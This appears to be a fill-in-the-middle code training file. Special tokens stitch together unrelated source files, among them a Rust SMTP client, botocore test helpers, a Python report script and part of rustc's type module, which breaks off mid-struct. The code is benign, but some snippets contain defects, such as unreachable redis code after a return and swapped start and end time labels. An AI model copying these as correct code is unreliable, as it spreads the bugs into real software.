abort(&mut self) { // Only try to quit if we are not already broken if !self.panic { self.panic = true; let _ = self.command(Quit); } } /// Sets the underlying stream pub fn set_stream(&mut self, stream: NetworkStream) { self.stream = BufReader::new(stream); } /// Tells if the underlying stream is currently encrypted pub fn is_encrypted(&self) -> bool { self.stream.get_ref().is_encrypted() } /// Set timeout pub fn set_timeout(&mut self, duration: Option<Duration>) -> io::Result<()> { self.stream.get_mut().set_read_timeout(duration)?; self.stream.get_mut().set_write_timeout(duration) } /// Checks if the server is connected using the NOOP SMTP command pub fn test_connected(&mut self) -> bool { self.command(Noop).is_ok() } /// Sends an AUTH command with the given mechanism, and handles challenge if needed pub fn auth( &mut self, mechanisms: &[Mechanism], credentials: &Credentials, ) -> Result<Response, Error> { let mechanism = self .server_info .get_auth_mechanism(mechanisms) .ok_or_else(|| error::client("No compatible authentication mechanism was found"))?; // Limit challenges to avoid blocking let mut challenges = 10; let mut response = self.command(Auth::new(mechanism, credentials.clone(), None)?)?; while challenges > 0 && response.has_code(334) { challenges -= 1; response = try_smtp!( self.command(Auth::new_from_response( mechanism, credentials.clone(), &response, )?), self ); } if challenges == 0 { Err(error::response("Unexpected number of challenges")) } else { Ok(response) } } /// Sends the message content pub fn message(&mut self, message: &[u8]) -> Result<Response, Error> { let mut out_buf: Vec<u8> = vec![]; let mut codec = ClientCodec::new(); codec.encode(message, &mut out_buf); self.write(out_buf.as_slice())?; self.write(b"\r\n.\r\n")?; self.read_response() } /// Sends an SMTP command pub fn command<C: Display>(&mut self, command: C) -> Result<Response, Error> { self.write(command.to_string().as_bytes())?; self.read_response() } /// Writes a string to the server fn write(&mut self, string: &[u8]) -> Result<(), Error> { self.stream .get_mut() .write_all(string) .map_err(error::network)?; self.stream.get_mut().flush().map_err(error::network)?; #[cfg(feature = "tracing")] tracing::debug!("Wrote: {}", escape_crlf(&String::from_utf8_lossy(string))); Ok(()) } /// Gets the SMTP response pub fn read_response(&mut self) -> Result<Response, Error> { let mut buffer = String::with_capacity(100); while self.stream.read_line(&mut buffer).map_err(error::network)? > 0 { #[cfg(feature = "tracing")] tracing::debug!("<< {}", escape_crlf(&buffer)); match parse_response(&buffer) { Ok((_remaining, response)) => { return if response.is_positive() { Ok(response) } else { Err(error::code(response.code())) }; } Err(nom::Err::Failure(e)) => { return Err(error::response(e.to_string())); } Err(nom::Err::Incomplete(_)) => { /* read more */ } Err(nom::Err::Error(e)) => { return Err(error::response(e.to_string())); } } } Err(error::response("incomplete response")) } }<|fim▁end|>
pub fn send(&mut self, envelope: &Envelope, email: &[u8]) -> Result<Response, Error> { // Mail let mut mail_options = vec![];
<|file_name|>utility.py<|end_file_name|><|fim▁begin|>""" Basic utility functions """ import redislite from .server import RDB_FILE def header(message, width=80): header_message = '## ' + message + ' '<|fim▁hole|> def connect_to_redis(): return redislite.Redis(dbfilename=RDB_FILE) host = read_rc_config()["settings"].get('redis_server', '127.0.0.1') port = read_rc_config()["settings"].get('redis_port', '18266') port = int(port) return redis.Redis(host=host, port=port)<|fim▁end|>
end_chars = width - (len(message) + 4) header_message += '#'*end_chars print(header_message)
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># Copyright 2012-2014 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. import os import sys import mock import time import random import shutil import contextlib import tempfile import binascii import platform import select import datetime from io import BytesIO from subprocess import Popen, PIPE from dateutil.tz import tzlocal import unittest from nose.tools import assert_equal import botocore.loaders import botocore.session from botocore.awsrequest import AWSResponse from botocore.compat import ( parse_qs, six, urlparse, HAS_CRT ) from botocore import utils from botocore import credentials from botocore.stub import Stubber _LOADER = botocore.loaders.Loader() def skip_unless_has_memory_collection(cls): """Class decorator to skip tests that require memory collection. Any test that uses memory collection (such as the resource leak tests) can decorate their class with skip_unless_has_memory_collection to indicate that if the platform does not support memory collection the tests should be skipped. """ if platform.system() not in ['Darwin', 'Linux']: return unittest.skip('Memory tests only supported on mac/linux.')(cls) return cls def skip_if_windows(reason): """Decorator to skip tests that should not be run on windows. Example usage: @skip_if_windows("Not valid") def test_some_non_windows_stuff(self): self.assertEqual(...) """ def decorator(func): return unittest.skipIf( platform.system() not in ['Darwin', 'Linux'], reason)(func) return decorator def requires_crt(reason=None): if reason is None: reason = "Test requires awscrt to be installed" def decorator(func): return unittest.skipIf(not HAS_CRT, reason)(func) return decorator def random_chars(num_chars): """Returns random hex characters. Useful for creating resources with random names. <|fim▁hole|> def create_session(**kwargs): # Create a Session object. By default, # the _LOADER object is used as the loader # so that we reused the same models across tests. session = botocore.session.Session(**kwargs) session.register_component('data_loader', _LOADER) session.set_config_variable('credentials_file', 'noexist/foo/botocore') return session @contextlib.contextmanager def temporary_file(mode): """This is a cross platform temporary file creation. tempfile.NamedTemporary file on windows creates a secure temp file that can't be read by other processes and can't be opened a second time. For tests, we generally *want* them to be read multiple times. The test fixture writes the temp file contents, the test reads the temp file. """ temporary_directory = tempfile.mkdtemp() basename = 'tmpfile-%s-%s' % (int(time.time()), random.randint(1, 1000)) full_filename = os.path.join(temporary_directory, basename) open(full_filename, 'w').close() try: with open(full_filename, mode) as f: yield f finally: shutil.rmtree(temporary_directory) class BaseEnvVar(unittest.TestCase): def setUp(self): # Automatically patches out os.environ for you # and gives you a self.environ attribute that simulates # the environment. Also will automatically restore state # for you in tearDown() self.environ = {} self.environ_patch = mock.patch('os.environ', self.environ) self.environ_patch.start() def tearDown(self): self.environ_patch.stop() class BaseSessionTest(BaseEnvVar): """Base class used to provide credentials. This class can be used as a base class that want to use a real session class but want to be completely isolated from the external environment (including environment variables). This class will also set credential vars so you can make fake requests to services. """ def setUp(self, **environ): super(BaseSessionTest, self).setUp() self.environ['AWS_ACCESS_KEY_ID'] = 'access_key' self.environ['AWS_SECRET_ACCESS_KEY'] = 'secret_key' self.environ['AWS_CONFIG_FILE'] = 'no-exist-foo' self.environ.update(environ) self.session = create_session() self.session.config_filename = 'no-exist-foo' @skip_unless_has_memory_collection class BaseClientDriverTest(unittest.TestCase): INJECT_DUMMY_CREDS = False def setUp(self): self.driver = ClientDriver() env = None if self.INJECT_DUMMY_CREDS: env = {'AWS_ACCESS_KEY_ID': 'foo', 'AWS_SECRET_ACCESS_KEY': 'bar'} self.driver.start(env=env) def cmd(self, *args): self.driver.cmd(*args) def send_cmd(self, *args): self.driver.send_cmd(*args) def record_memory(self): self.driver.record_memory() @property def memory_samples(self): return self.driver.memory_samples def tearDown(self): self.driver.stop() class ClientDriver(object): CLIENT_SERVER = os.path.join( os.path.dirname(os.path.abspath(__file__)), 'cmd-runner' ) def __init__(self): self._popen = None self.memory_samples = [] def _get_memory_with_ps(self, pid): # It would be better to eventually switch to psutil, # which should allow us to test on windows, but for now # we'll just use ps and run on POSIX platforms. command_list = ['ps', '-p', str(pid), '-o', 'rss'] p = Popen(command_list, stdout=PIPE) stdout = p.communicate()[0] if not p.returncode == 0: raise RuntimeError("Could not retrieve memory") else: # Get the RSS from output that looks like this: # RSS # 4496 return int(stdout.splitlines()[1].split()[0]) * 1024 def record_memory(self): mem = self._get_memory_with_ps(self._popen.pid) self.memory_samples.append(mem) def start(self, env=None): """Start up the command runner process.""" self._popen = Popen([sys.executable, self.CLIENT_SERVER], stdout=PIPE, stdin=PIPE, env=env) def stop(self): """Shutdown the command runner process.""" self.cmd('exit') self._popen.wait() def send_cmd(self, *cmd): """Send a command and return immediately. This is a lower level method than cmd(). This method will instruct the cmd-runner process to execute a command, but this method will immediately return. You will need to use ``is_cmd_finished()`` to check that the command is finished. This method is useful if you want to record attributes about the process while an operation is occurring. For example, if you want to instruct the cmd-runner process to upload a 1GB file to S3 and you'd like to record the memory during the upload process, you can use send_cmd() instead of cmd(). """ cmd_str = ' '.join(cmd) + '\n' cmd_bytes = cmd_str.encode('utf-8') self._popen.stdin.write(cmd_bytes) self._popen.stdin.flush() def is_cmd_finished(self): rlist = [self._popen.stdout.fileno()] result = select.select(rlist, [], [], 0.01) if result[0]: return True return False def cmd(self, *cmd): """Send a command and block until it finishes. This method will send a command to the cmd-runner process to run. It will block until the cmd-runner process is finished executing the command and sends back a status response. """ self.send_cmd(*cmd) result = self._popen.stdout.readline().strip() if result != b'OK': raise RuntimeError( "Error from command '%s': %s" % (cmd, result)) # This is added to this file because it's used in both # the functional and unit tests for cred refresh. class IntegerRefresher(credentials.RefreshableCredentials): """Refreshable credentials to help with testing. This class makes testing refreshable credentials easier. It has the following functionality: * A counter, self.refresh_counter, to indicate how many times refresh was called. * A way to specify how many seconds to make credentials valid. * Configurable advisory/mandatory refresh. * An easy way to check consistency. Each time creds are refreshed, all the cred values are set to the next incrementing integer. Frozen credentials should always have this value. """ _advisory_refresh_timeout = 2 _mandatory_refresh_timeout = 1 _credentials_expire = 3 def __init__(self, creds_last_for=_credentials_expire, advisory_refresh=_advisory_refresh_timeout, mandatory_refresh=_mandatory_refresh_timeout, refresh_function=None): expires_in = ( self._current_datetime() + datetime.timedelta(seconds=creds_last_for)) if refresh_function is None: refresh_function = self._do_refresh super(IntegerRefresher, self).__init__( '0', '0', '0', expires_in, refresh_function, 'INTREFRESH') self.creds_last_for = creds_last_for self.refresh_counter = 0 self._advisory_refresh_timeout = advisory_refresh self._mandatory_refresh_timeout = mandatory_refresh def _do_refresh(self): self.refresh_counter += 1 current = int(self._access_key) next_id = str(current + 1) return { 'access_key': next_id, 'secret_key': next_id, 'token': next_id, 'expiry_time': self._seconds_later(self.creds_last_for), } def _seconds_later(self, num_seconds): # We need to guarantee at *least* num_seconds. # Because this doesn't handle subsecond precision # we'll round up to the next second. num_seconds += 1 t = self._current_datetime() + datetime.timedelta(seconds=num_seconds) return self._to_timestamp(t) def _to_timestamp(self, datetime_obj): obj = utils.parse_to_aware_datetime(datetime_obj) return obj.strftime('%Y-%m-%dT%H:%M:%SZ') def _current_timestamp(self): return self._to_timestamp(self._current_datetime()) def _current_datetime(self): return datetime.datetime.now(tzlocal()) def _urlparse(url): if isinstance(url, six.binary_type): # Not really necessary, but it helps to reduce noise on Python 2.x url = url.decode('utf8') return urlparse(url) def assert_url_equal(url1, url2): parts1 = _urlparse(url1) parts2 = _urlparse(url2) # Because the query string ordering isn't relevant, we have to parse # every single part manually and then handle the query string. assert_equal(parts1.scheme, parts2.scheme) assert_equal(parts1.netloc, parts2.netloc) assert_equal(parts1.path, parts2.path) assert_equal(parts1.params, parts2.params) assert_equal(parts1.fragment, parts2.fragment) assert_equal(parts1.username, parts2.username) assert_equal(parts1.password, parts2.password) assert_equal(parts1.hostname, parts2.hostname) assert_equal(parts1.port, parts2.port) assert_equal(parse_qs(parts1.query), parse_qs(parts2.query)) class HTTPStubberException(Exception): pass class RawResponse(BytesIO): # TODO: There's a few objects similar to this in various tests, let's # try and consolidate to this one in a future commit. def stream(self, **kwargs): contents = self.read() while contents: yield contents contents = self.read() class BaseHTTPStubber(object): def __init__(self, obj_with_event_emitter, strict=True): self.reset() self._strict = strict self._obj_with_event_emitter = obj_with_event_emitter def reset(self): self.requests = [] self.responses = [] def add_response(self, url='https://example.com', status=200, headers=None, body=b''): if headers is None: headers = {} raw = RawResponse(body) response = AWSResponse(url, status, headers, raw) self.responses.append(response) @property def _events(self): raise NotImplementedError('_events') def start(self): self._events.register('before-send', self) def stop(self): self._events.unregister('before-send', self) def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_value, traceback): self.stop() def __call__(self, request, **kwargs): self.requests.append(request) if self.responses: response = self.responses.pop(0) if isinstance(response, Exception): raise response else: return response elif self._strict: raise HTTPStubberException('Insufficient responses') else: return None class ClientHTTPStubber(BaseHTTPStubber): @property def _events(self): return self._obj_with_event_emitter.meta.events class SessionHTTPStubber(BaseHTTPStubber): @property def _events(self): return self._obj_with_event_emitter.get_component('event_emitter') class ConsistencyWaiterException(Exception): pass class ConsistencyWaiter(object): """ A waiter class for some check to reach a consistent state. :type min_successes: int :param min_successes: The minimum number of successful check calls to treat the check as stable. Default of 1 success. :type max_attempts: int :param min_successes: The maximum number of times to attempt calling the check. Default of 20 attempts. :type delay: int :param delay: The number of seconds to delay the next API call after a failed check call. Default of 5 seconds. """ def __init__(self, min_successes=1, max_attempts=20, delay=5, delay_initial_poll=False): self.min_successes = min_successes self.max_attempts = max_attempts self.delay = delay self.delay_initial_poll = delay_initial_poll def wait(self, check, *args, **kwargs): """ Wait until the check succeeds the configured number of times :type check: callable :param check: A callable that returns True or False to indicate if the check succeeded or failed. :type args: list :param args: Any ordered arguments to be passed to the check. :type kwargs: dict :param kwargs: Any keyword arguments to be passed to the check. """ attempts = 0 successes = 0 if self.delay_initial_poll: time.sleep(self.delay) while attempts < self.max_attempts: attempts += 1 if check(*args, **kwargs): successes += 1 if successes >= self.min_successes: return else: time.sleep(self.delay) fail_msg = self._fail_message(attempts, successes) raise ConsistencyWaiterException(fail_msg) def _fail_message(self, attempts, successes): format_args = (attempts, successes) return 'Failed after %s attempts, only had %s successes' % format_args class StubbedSession(botocore.session.Session): def __init__(self, *args, **kwargs): super(StubbedSession, self).__init__(*args, **kwargs) self._cached_clients = {} self._client_stubs = {} def create_client(self, service_name, *args, **kwargs): if service_name not in self._cached_clients: client = self._create_stubbed_client(service_name, *args, **kwargs) self._cached_clients[service_name] = client return self._cached_clients[service_name] def _create_stubbed_client(self, service_name, *args, **kwargs): client = super(StubbedSession, self).create_client( service_name, *args, **kwargs) stubber = Stubber(client) self._client_stubs[service_name] = stubber return client def stub(self, service_name, *args, **kwargs): if service_name not in self._client_stubs: self.create_client(service_name, *args, **kwargs) return self._client_stubs[service_name] def activate_stubs(self): for stub in self._client_stubs.values(): stub.activate() def verify_stubs(self): for stub in self._client_stubs.values(): stub.assert_no_pending_responses()<|fim▁end|>
""" return binascii.hexlify(os.urandom(int(num_chars / 2))).decode('ascii')
<|file_name|>debug_store_hash_fn_imps.hpp<|end_file_name|><|fim▁begin|>// -*- C++ -*-<|fim▁hole|>// software; you can redistribute it and/or modify it under the terms // of the GNU General Public License as published by the Free Software // Foundation; either version 3, or (at your option) any later // version. // This library is distributed in the hope that it will be useful, but // WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU // General Public License for more details. // Under Section 7 of GPL version 3, you are granted additional // permissions described in the GCC Runtime Library Exception, version // 3.1, as published by the Free Software Foundation. // You should have received a copy of the GNU General Public License and // a copy of the GCC Runtime Library Exception along with this program; // see the files COPYING3 and COPYING.RUNTIME respectively. If not, see // <http://www.gnu.org/licenses/>. // Copyright (C) 2004 Ami Tavory and Vladimir Dreizin, IBM-HRL. // Permission to use, copy, modify, sell, and distribute this software // is hereby granted without fee, provided that the above copyright // notice appears in all copies, and that both that copyright notice // and this permission notice appear in supporting documentation. None // of the above authors, nor IBM Haifa Research Laboratories, make any // representation about the suitability of this software for any // purpose. It is provided "as is" without express or implied // warranty. /** * @file cc_hash_table_map_/debug_store_hash_fn_imps.hpp * Contains implementations of cc_ht_map_'s debug-mode functions. */ #ifdef _GLIBCXX_DEBUG PB_DS_CLASS_T_DEC void PB_DS_CLASS_C_DEC:: assert_entry_pointer_valid(const entry_pointer p_e, true_type, const char* __file, int __line) const { debug_base::check_key_exists(PB_DS_V2F(p_e->m_value), __file, __line); comp_hash pos_hash_pair = ranged_hash_fn_base::operator()(PB_DS_V2F(p_e->m_value)); PB_DS_DEBUG_VERIFY(p_e->m_hash == pos_hash_pair.second); } #endif<|fim▁end|>
// Copyright (C) 2005-2015 Free Software Foundation, Inc. // // This file is part of the GNU ISO C++ Library. This library is free
<|file_name|>water_thief.py<|end_file_name|><|fim▁begin|>import sys from services.spawn import MobileTemplate from services.spawn import WeaponTemplate from resources.datatables import WeaponType from resources.datatables import Difficulty from resources.datatables import Options from java.util import Vector def addTemplate(core): mobileTemplate = MobileTemplate() mobileTemplate.setCreatureName('water_thief') mobileTemplate.setLevel(5) mobileTemplate.setDifficulty(Difficulty.NORMAL) mobileTemplate.setMinSpawnDistance(4) mobileTemplate.setMaxSpawnDistance(8) mobileTemplate.setDeathblow(False)<|fim▁hole|> mobileTemplate.setScale(1) mobileTemplate.setSocialGroup("thug") mobileTemplate.setAssistRange(4) mobileTemplate.setStalker(True) mobileTemplate.setOptionsBitmask(Options.AGGRESSIVE | Options.ATTACKABLE) templates = Vector() templates.add('object/mobile/shared_dressed_tatooine_moisture_thief.iff') mobileTemplate.setTemplates(templates) weaponTemplates = Vector() weapontemplate = WeaponTemplate('object/weapon/melee/sword/shared_sword_01.iff', WeaponType.ONEHANDEDMELEE, 1.0, 5, 'kinetic') weaponTemplates.add(weapontemplate) mobileTemplate.setWeaponTemplateVector(weaponTemplates) attacks = Vector() mobileTemplate.setDefaultAttack('saberhit') mobileTemplate.setAttacks(attacks) core.spawnService.addMobileTemplate('water_thief', mobileTemplate) return<|fim▁end|>
<|file_name|>get-propuestas-electorales-v5.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # -*- coding: utf-8 -*- ''' This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License version 3 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/gpl-3.0.txt>. ''' import sys sys.path.append('../shared') import functions as f import ape, operator def main(): d_output = ape.format_results('results.json') crlf = '\r\n' output = [] s = '=======================================' for item in sorted(d_output.iteritems(), key = operator.itemgetter(0)): d_item = item[1] f.append(output, s + crlf + 'Propuestas tarea - ' + item[0] + (' (' + d_item['task_id'] + ')') + crlf + s) f.append(output, d_item['breadcrumbs']) f.append(output, d_item['pages'] + crlf + '------------------') answers = d_item['answers'] for answer in answers: <|fim▁hole|> answer = answer[0] + ' (' + answer[1] + ')' else: answer = '(' + str(answer) + ')' f.append(output, 'Propuestas analista ' + answer + crlf + '---------------------------------------') f.append(output, 'Hora de inicio: ' + f.formatTime(answers[answ]['answer_end_date']) + crlf + 'Hora de fin: ' + f.formatTime(answers[answ]['answer_start_date'])) for item in answers[answ]['answer'].split('\n'): if item.replace(' ', '') != '': f.append(output, item + crlf + '----------') f.write_file('propuestas.txt', str(crlf * 2).join(output)) if __name__ == '__main__': main()<|fim▁end|>
answ = answer if 'desconocido' in answer: answer = answer.split('_')
<|file_name|>.ycm_extra_conf.py<|end_file_name|><|fim▁begin|># Generated by YCM Generator at 2019-06-21 11:57:11.711058 # This file is NOT licensed under the GPLv3, which is the license for the rest # of YouCompleteMe. # # Here's the license text for this file: # # This is free and unencumbered software released into the public domain. # # Anyone is free to copy, modify, publish, use, compile, sell, or # distribute this software, either in source code form or as a compiled # binary, for any purpose, commercial or non-commercial, and by any # means. # # In jurisdictions that recognize copyright laws, the author or authors # of this software dedicate any and all copyright interest in the # software to the public domain. We make this dedication for the benefit # of the public at large and to the detriment of our heirs and # successors. We intend this dedication to be an overt act of # relinquishment in perpetuity of all present and future rights to this # software under copyright law. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, # ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. # # For more information, please refer to <http://unlicense.org/> import os import ycm_core flags = [ '-x', 'c++', '-I../../utils/', ] # Set this to the absolute path to the folder (NOT the file!) containing the # compile_commands.json file to use that instead of 'flags'. See here for # more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html # # You can get CMake to generate this file for you by adding: # set( CMAKE_EXPORT_COMPILE_COMMANDS 1 ) # to your CMakeLists.txt file. # # Most projects will NOT need to set this to anything; you can just change the # 'flags' list of compilation flags. Notice that YCM itself uses that approach.<|fim▁hole|>compilation_database_folder = '' if os.path.exists( compilation_database_folder ): database = ycm_core.CompilationDatabase( compilation_database_folder ) else: database = None SOURCE_EXTENSIONS = [ '.C', '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ] def DirectoryOfThisScript(): return os.path.dirname( os.path.abspath( __file__ ) ) def MakeRelativePathsInFlagsAbsolute( flags, working_directory ): if not working_directory: return list( flags ) new_flags = [] make_next_absolute = False path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ] for flag in flags: new_flag = flag if make_next_absolute: make_next_absolute = False if not flag.startswith( '/' ): new_flag = os.path.join( working_directory, flag ) for path_flag in path_flags: if flag == path_flag: make_next_absolute = True break if flag.startswith( path_flag ): path = flag[ len( path_flag ): ] new_flag = path_flag + os.path.join( working_directory, path ) break if new_flag: new_flags.append( new_flag ) return new_flags def IsHeaderFile( filename ): extension = os.path.splitext( filename )[ 1 ] return extension in [ '.H', '.h', '.hxx', '.hpp', '.hh' ] def GetCompilationInfoForFile( filename ): # The compilation_commands.json file generated by CMake does not have entries # for header files. So we do our best by asking the db for flags for a # corresponding source file, if any. If one exists, the flags for that file # should be good enough. if IsHeaderFile( filename ): basename = os.path.splitext( filename )[ 0 ] for extension in SOURCE_EXTENSIONS: replacement_file = basename + extension if os.path.exists( replacement_file ): compilation_info = database.GetCompilationInfoForFile( replacement_file ) if compilation_info.compiler_flags_: return compilation_info return None return database.GetCompilationInfoForFile( filename ) def FlagsForFile( filename, **kwargs ): if database: # Bear in mind that compilation_info.compiler_flags_ does NOT return a # python list, but a "list-like" StringVec object compilation_info = GetCompilationInfoForFile( filename ) if not compilation_info: return None final_flags = MakeRelativePathsInFlagsAbsolute( compilation_info.compiler_flags_, compilation_info.compiler_working_dir_ ) else: relative_to = DirectoryOfThisScript() final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to ) return { 'flags': final_flags, 'do_cache': True }<|fim▁end|>
<|file_name|>ty.rs<|end_file_name|><|fim▁begin|>// Copyright 2012-2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. #![allow(non_camel_case_types)] use back::svh::Svh; use driver::session::Session; use metadata::csearch; use middle::const_eval; use middle::lang_items::{ExchangeHeapLangItem, OpaqueStructLangItem}; use middle::lang_items::{TyDescStructLangItem, TyVisitorTraitLangItem}; use middle::freevars; use middle::resolve; use middle::resolve_lifetime; use middle::ty; use middle::subst::Subst; use middle::typeck; use middle::typeck::{MethodCall, MethodCallee, MethodMap}; use middle::ty_fold; use middle::ty_fold::TypeFolder; use middle; use util::ppaux::{note_and_explain_region, bound_region_ptr_to_str}; use util::ppaux::{trait_store_to_str, ty_to_str, vstore_to_str}; use util::ppaux::{Repr, UserString}; use util::common::{indenter}; use util::nodemap::{NodeMap, NodeSet, DefIdMap, DefIdSet, FnvHashMap}; use std::cast; use std::cell::{Cell, RefCell}; use std::cmp; use std::fmt::Show; use std::fmt; use std::hash::{Hash, sip}; use std::ops; use std::rc::Rc; use collections::{HashMap, HashSet}; use syntax::ast::*; use syntax::ast_util::{is_local, lit_is_str}; use syntax::ast_util; use syntax::attr; use syntax::attr::AttrMetaMethods; use syntax::codemap::Span; use syntax::parse::token; use syntax::parse::token::InternedString; use syntax::{ast, ast_map}; use syntax::owned_slice::OwnedSlice; use syntax::abi::AbiSet; use syntax; use collections::enum_set::{EnumSet, CLike}; pub type Disr = u64; pub static INITIAL_DISCRIMINANT_VALUE: Disr = 0; // Data types #[deriving(Eq, TotalEq, Hash)] pub struct field { ident: ast::Ident, mt: mt } #[deriving(Clone)] pub enum MethodContainer { TraitContainer(ast::DefId), ImplContainer(ast::DefId), } #[deriving(Clone)] pub struct Method { ident: ast::Ident, generics: ty::Generics, fty: BareFnTy, explicit_self: ast::ExplicitSelf_, vis: ast::Visibility, def_id: ast::DefId, container: MethodContainer, // If this method is provided, we need to know where it came from provided_source: Option<ast::DefId> } impl Method { pub fn new(ident: ast::Ident, generics: ty::Generics, fty: BareFnTy, explicit_self: ast::ExplicitSelf_, vis: ast::Visibility, def_id: ast::DefId, container: MethodContainer, provided_source: Option<ast::DefId>) -> Method { Method { ident: ident, generics: generics, fty: fty, explicit_self: explicit_self, vis: vis, def_id: def_id, container: container, provided_source: provided_source } } pub fn container_id(&self) -> ast::DefId { match self.container { TraitContainer(id) => id, ImplContainer(id) => id, } } } pub struct Impl { did: DefId, ident: Ident, methods: Vec<@Method> } #[deriving(Clone, Eq, TotalEq, Hash)] pub struct mt { ty: t, mutbl: ast::Mutability, } #[deriving(Clone, Eq, TotalEq, Encodable, Decodable, Hash, Show)] pub enum vstore { vstore_fixed(uint), vstore_uniq, vstore_slice(Region) } #[deriving(Clone, Eq, TotalEq, Hash, Encodable, Decodable, Show)] pub enum TraitStore { UniqTraitStore, // ~Trait RegionTraitStore(Region), // &Trait } pub struct field_ty { name: Name, id: DefId, vis: ast::Visibility, } // Contains information needed to resolve types and (in the future) look up // the types of AST nodes. #[deriving(Eq, TotalEq, Hash)] pub struct creader_cache_key { cnum: CrateNum, pos: uint, len: uint } pub type creader_cache = RefCell<HashMap<creader_cache_key, t>>; pub struct intern_key { sty: *sty, } // NB: Do not replace this with #[deriving(Eq)]. The automatically-derived // implementation will not recurse through sty and you will get stack // exhaustion. impl cmp::Eq for intern_key { fn eq(&self, other: &intern_key) -> bool { unsafe { *self.sty == *other.sty } } fn ne(&self, other: &intern_key) -> bool { !self.eq(other) } } impl TotalEq for intern_key {} impl<W:Writer> Hash<W> for intern_key { fn hash(&self, s: &mut W) { unsafe { (*self.sty).hash(s) } } } pub enum ast_ty_to_ty_cache_entry { atttce_unresolved, /* not resolved yet */ atttce_resolved(t) /* resolved to a type, irrespective of region */ } #[deriving(Clone, Eq, Decodable, Encodable)] pub struct ItemVariances { self_param: Option<Variance>, type_params: OwnedSlice<Variance>, region_params: OwnedSlice<Variance> } #[deriving(Clone, Eq, Decodable, Encodable, Show)] pub enum Variance { Covariant, // T<A> <: T<B> iff A <: B -- e.g., function return type Invariant, // T<A> <: T<B> iff B == A -- e.g., type of mutable cell Contravariant, // T<A> <: T<B> iff B <: A -- e.g., function param type Bivariant, // T<A> <: T<B> -- e.g., unused type parameter } pub enum AutoAdjustment { AutoAddEnv(ty::Region, ast::Sigil), AutoDerefRef(AutoDerefRef), AutoObject(ast::Sigil, Option<ty::Region>, ast::Mutability, ty::BuiltinBounds, ast::DefId, /* Trait ID */ ty::substs /* Trait substitutions */) } #[deriving(Decodable, Encodable)] pub struct AutoDerefRef { autoderefs: uint, autoref: Option<AutoRef> } #[deriving(Decodable, Encodable, Eq, Show)] pub enum AutoRef { /// Convert from T to &T AutoPtr(Region, ast::Mutability), /// Convert from ~[]/&[] to &[] (or str) AutoBorrowVec(Region, ast::Mutability), /// Convert from ~[]/&[] to &&[] (or str) AutoBorrowVecRef(Region, ast::Mutability), /// Convert from @fn()/~fn()/|| to || AutoBorrowFn(Region), /// Convert from T to *T AutoUnsafe(ast::Mutability), /// Convert from ~Trait/&Trait to &Trait AutoBorrowObj(Region, ast::Mutability), } /// The data structure to keep track of all the information that typechecker /// generates so that so that it can be reused and doesn't have to be redone /// later on. pub struct ctxt { // Specifically use a speedy hash algorithm for this hash map, it's used // quite often. interner: RefCell<FnvHashMap<intern_key, ~t_box_>>, next_id: Cell<uint>, sess: Session, def_map: resolve::DefMap, named_region_map: resolve_lifetime::NamedRegionMap, region_maps: middle::region::RegionMaps, // Stores the types for various nodes in the AST. Note that this table // is not guaranteed to be populated until after typeck. See // typeck::check::fn_ctxt for details. node_types: node_type_table, // Stores the type parameters which were substituted to obtain the type // of this node. This only applies to nodes that refer to entities // parameterized by type parameters, such as generic fns, types, or // other items. node_type_substs: RefCell<NodeMap<Vec<t>>>, // Maps from a method to the method "descriptor" methods: RefCell<DefIdMap<@Method>>, // Maps from a trait def-id to a list of the def-ids of its methods trait_method_def_ids: RefCell<DefIdMap<@Vec<DefId> >>, // A cache for the trait_methods() routine trait_methods_cache: RefCell<DefIdMap<@Vec<@Method> >>, impl_trait_cache: RefCell<DefIdMap<Option<@ty::TraitRef>>>, trait_refs: RefCell<NodeMap<@TraitRef>>, trait_defs: RefCell<DefIdMap<@TraitDef>>, map: ast_map::Map, intrinsic_defs: RefCell<DefIdMap<t>>, freevars: RefCell<freevars::freevar_map>, tcache: type_cache, rcache: creader_cache, short_names_cache: RefCell<HashMap<t, ~str>>, needs_unwind_cleanup_cache: RefCell<HashMap<t, bool>>, tc_cache: RefCell<HashMap<uint, TypeContents>>, ast_ty_to_ty_cache: RefCell<NodeMap<ast_ty_to_ty_cache_entry>>, enum_var_cache: RefCell<DefIdMap<@Vec<@VariantInfo> >>, ty_param_defs: RefCell<NodeMap<TypeParameterDef>>, adjustments: RefCell<NodeMap<@AutoAdjustment>>, normalized_cache: RefCell<HashMap<t, t>>, lang_items: @middle::lang_items::LanguageItems, // A mapping of fake provided method def_ids to the default implementation provided_method_sources: RefCell<DefIdMap<ast::DefId>>, supertraits: 